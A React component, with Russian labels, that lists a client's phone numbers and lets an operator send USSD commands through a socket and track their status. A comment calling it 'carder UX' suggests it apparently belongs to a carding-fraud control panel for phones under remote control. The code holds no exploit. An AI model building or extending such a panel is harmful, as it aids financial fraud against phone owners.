import { socket } from '@/api/socket';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import type { IPhone } from '@/entities/client.entity';
import { PhoneIcon } from 'lucide-react';
import { useState } from 'react';

type PhoneRow = Pick<IPhone, 'name' | 'number'> & { id?: number; subId?: string; status?: number };

interface ClientPhonesProps {
	phones: PhoneRow[] | undefined | null;
	onCopy: (text: string) => void;
	/** Full carder UX with USSD retry; simple = numbers only */
	variant?: 'ussd' | 'simple';
}

export default function ClientPhones({ phones, onCopy, variant = 'ussd' }: ClientPhonesProps) {
	const [ussdText, setUssdText] = useState('');
	const list = phones?.filter(p => p) ?? [];

	return (
		<div className='flex flex-col gap-1'>
			<div className='flex items-center gap-1'>
				<PhoneIcon size={14} className='opacity-40' />
				<span className='text-sm text-muted-foreground'>Номера</span>
			</div>
			<div className='flex flex-col pl-0.5 gap-0.5'>
				{list.length ? (
					list
						.slice()
						.sort((a, b) => (a.id ?? 0) - (b.id ?? 0))
						.map((phone, i) => {
							if (variant === 'simple') {
								if (!phone.number) return null;
								return (
									<button
										key={`${phone.subId ?? phone.id ?? i}`}
										type='button'
										className='text-left text-sm hover:bg-accent active:bg-accent rounded-xs px-0.5 cursor-pointer select-none'
										onClick={() => onCopy(phone.number!)}
									>
										{phone.name ? <span className='text-muted-foreground font-medium mr-1'>{phone.name}:</span> : null}
										{phone.number}
									</button>
								);
							}

							return (
								<div key={phone.id ?? i} className='flex gap-1 items-center min-h-7'>
									<span className='text-sm text-muted-foreground font-semibold shrink-0'>{phone.name}:</span>
									{phone.number ? (
										<button
											type='button'
											className='text-sm hover:bg-accent active:bg-accent rounded-xs px-0.5 cursor-pointer select-none truncate'
											onClick={() => onCopy(phone.number!)}
										>
											{phone.number}
										</button>
									) : phone.status === 0 ? (
										<div className='flex gap-1 items-center'>
											<Input className='w-13 h-6 p-0 px-0.5 text-sm' value={ussdText} onChange={e => setUssdText(e.target.value)} />
											{ussdText ? (
												<Button
													variant='outline'
													size='sm'
													className='text-xs h-6'
													onClick={() => socket.emit('create-action-ussd', phone.id, ussdText.trim())}
												>
													Перезапросить
												</Button>
											) : null}
										</div>
									) : phone.status === 1 ? (
										<span className='text-sm text-[#ff9d00]'>Команда создана</span>
									) : phone.status === 2 ? (
										<span className='text-sm text-green-500'>Команда получена</span>
									) : phone.status === 3 ? (
										<div className='flex gap-1 items-center'>
											<span className='text-sm text-red-500'>Ошибка</span>
											<Input className='w-13 h-6 p-0 px-0.5 text-sm' value={ussdText} onChange={e => setUssdText(e.target.value)} />
											{ussdText ? (
												<Button
													variant='outline'
													size='sm'
													className='text-xs h-6'
													onClick={() => socket.emit('create-action-ussd', phone.id, ussdText.trim())}
												>
													Перезапросить
												</Button>
											) : null}
										</div>
									) : (
										<span className='text-sm opacity-60'>Неизвестный статус</span>
									)}
								</div>
							);
						})
				) : (
					<span className='opacity-60 text-sm'>{variant === 'simple' ? 'Нет номера' : 'Нет номеров'}</span>
				)}
			</div>
		</div>
	);
}
